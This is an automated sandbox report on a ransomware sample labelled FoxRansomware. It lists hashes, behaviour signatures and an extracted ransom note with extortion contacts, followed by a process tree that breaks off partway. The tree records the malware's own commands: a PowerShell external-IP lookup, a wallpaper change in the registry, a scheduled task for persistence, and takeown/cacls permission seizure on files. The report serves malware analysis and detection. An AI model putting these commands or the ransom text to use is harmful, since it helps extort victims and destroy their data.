Analysis

  • max time kernel
    184s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    13-02-2024 05:15

General

  • Target

    FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

  • Size

    1.2MB

  • MD5

    268360527625d09e747d9f7ab1f84da5

  • SHA1

    09772eb89c9743d3a6d7b2709c76e9740aa4c4b1

  • SHA256

    42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620

  • SHA512

    07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1

  • SSDEEP

    24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 58E16F8109642D40\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 58E16F8109642D40\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 GKw5egDo\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 59 IoCs
  • Loads dropped DLL 60 IoCs
  • Modifies file permissions 1 TTPs 29 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops desktop.ini file(s) 40 IoCs
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe"
      2⤵
        PID:2696
      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWgTwPHO.exe" -n
        2⤵
        • Executes dropped EXE
        PID:2580
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\VsXhzO5K.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2028
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2872
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\VjQ8qyxz.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1740
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\VjQ8qyxz.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:3000
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:2640
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:2884
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zCoOFkW6.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1980
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\zCoOFkW6.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2508
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2888
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\oGCkLmPD.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:1624
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                  PID:4024
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Run /I /tn DSHCA
                    5⤵
                      PID:652
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2004
                • C:\Windows\SysWOW64\cacls.exe
                  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
                  3⤵
                    PID:2744
                  • C:\Windows\SysWOW64\takeown.exe
                    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
                    3⤵
                    • Modifies file permissions
                    PID:748
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner
                    3⤵
                    • Loads dropped DLL
                    PID:1072
                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                      uSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:3280
                      • C:\Users\Admin\AppData\Local\Temp\uSDT8H9y64.exe
                        uSDT8H9y.exe -accepteula "SignHere.pdf" -nobanner
                        5⤵
                        • Drops file in Drivers directory
                        • Sets service image path in registry
                        • Executes dropped EXE
                        • Enumerates connected drives
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: LoadsDriver
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3308
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
                  2⤵
                  • Loads dropped DLL
                  PID:3956
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
                    3⤵
                      PID:3132
                    • C:\Windows\SysWOW64\takeown.exe
                      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
                      3⤵
                      • Modifies file permissions
                      PID:3152
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "StandardBusiness.pdf" -nobanner
                      3⤵
                      • Loads dropped DLL
                      PID:3092
                      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                        uSDT8H9y.exe -accepteula "StandardBusiness.pdf" -nobanner
                        4⤵
                        • Executes dropped EXE
                        PID:3068
                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                      uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                      3⤵
                      • Executes dropped EXE
                      PID:3224
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
                    2⤵
                    • Loads dropped DLL
                    PID:2028
                    • C:\Windows\SysWOW64\cacls.exe
                      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
                      3⤵
                        PID:1932
                      • C:\Windows\SysWOW64\takeown.exe
                        takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
                        3⤵
                        • Modifies file permissions
                        PID:1940
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "ENUtxt.pdf" -nobanner
                        3⤵
                        • Loads dropped DLL
                        PID:3300
                        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                          uSDT8H9y.exe -accepteula "ENUtxt.pdf" -nobanner
                          4⤵
                          • Executes dropped EXE
                          PID:3324
                      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                        uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                        3⤵
                        • Executes dropped EXE
                        PID:2832
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
                      2⤵
                      • Loads dropped DLL
                      PID:1728
                      • C:\Windows\SysWOW64\cacls.exe
                        cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
                        3⤵
                          PID:3680
                        • C:\Windows\SysWOW64\takeown.exe
                          takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
                          3⤵
                          • Modifies file permissions
                          PID:3760
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "AdobeID.pdf" -nobanner
                          3⤵
                          • Loads dropped DLL
                          PID:3768
                          • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                            uSDT8H9y.exe -accepteula "AdobeID.pdf" -nobanner
                            4⤵
                            • Executes dropped EXE
                            PID:3776
                        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                          uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                          3⤵
                          • Executes dropped EXE
                          PID:3808
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
                        2⤵
                        • Loads dropped DLL
                        PID:1872
                        • C:\Windows\SysWOW64\cacls.exe
                          cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
                          3⤵
                            PID:1060
                          • C:\Windows\SysWOW64\takeown.exe
                            takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
                            3⤵
                            • Modifies file permissions
                            PID:1560
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
                            3⤵
                            • Loads dropped DLL
                            PID:2088
                            • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                              uSDT8H9y.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
                              4⤵
                              • Executes dropped EXE
                              PID:2884
                          • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                            uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                            3⤵
                            • Executes dropped EXE
                            PID:1356
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
                          2⤵
                          • Loads dropped DLL
                          PID:2168
                          • C:\Windows\SysWOW64\cacls.exe
                            cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
                            3⤵
                              PID:3984
                            • C:\Windows\SysWOW64\takeown.exe
                              takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
                              3⤵
                              • Modifies file permissions
                              PID:3996
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "Dynamic.pdf" -nobanner
                              3⤵
                              • Loads dropped DLL
                              PID:3940
                              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                uSDT8H9y.exe -accepteula "Dynamic.pdf" -nobanner
                                4⤵
                                • Executes dropped EXE
                                PID:3936
                            • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                              uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                              3⤵
                              • Executes dropped EXE
                              PID:3912
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
                            2⤵
                            • Loads dropped DLL
                            PID:3872
                            • C:\Windows\SysWOW64\cacls.exe
                              cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
                              3⤵
                                PID:3140
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
                                3⤵
                                • Modifies file permissions
                                PID:3212
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "DefaultID.pdf" -nobanner
                                3⤵
                                • Loads dropped DLL
                                PID:3104
                                • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                  uSDT8H9y.exe -accepteula "DefaultID.pdf" -nobanner
                                  4⤵
                                  • Executes dropped EXE
                                  PID:3136
                              • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                3⤵
                                • Executes dropped EXE
                                PID:3124
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
                              2⤵
                              • Loads dropped DLL
                              PID:3080
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
                                3⤵
                                  PID:1744
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
                                  3⤵
                                  • Modifies file permissions
                                  PID:2088
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "classes.jsa" -nobanner
                                  3⤵
                                  • Loads dropped DLL
                                  PID:3000
                                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                    uSDT8H9y.exe -accepteula "classes.jsa" -nobanner
                                    4⤵
                                    • Executes dropped EXE
                                    PID:1356
                                • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
                                  uSDT8H9y.exe -accepteula -c Run -y -p extract -nobanner
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1408
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vmDcYnNc.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
                                2⤵
                                • Loads dropped DLL
                                PID:3484
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
                                  3⤵
                                    PID:1512
                                  • C:\Windows\SysWOW64\takeown.exe
                                    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
                                    3⤵
                                    • Modifies file permissions
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2068
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c uSDT8H9y.exe -accepteula "FreeCellMCE.png" -nobanner
                                    3⤵
                                    • Loads dropped DLL
                                    PID:2188
                                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\uSDT8H9y.exe
